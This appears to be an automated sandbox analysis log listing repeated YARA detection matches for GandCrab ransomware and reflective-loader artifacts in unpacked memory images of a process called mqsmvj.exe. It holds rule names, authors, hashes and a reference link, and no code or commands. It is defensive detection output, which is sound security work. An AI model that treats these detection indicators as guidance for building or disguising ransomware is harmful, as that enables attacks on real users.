                Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 39.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 14.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 26.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 19.3.mqsmvj.exe.3930000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
                Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
                Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPEMatched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
                Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
                Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPEMatched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
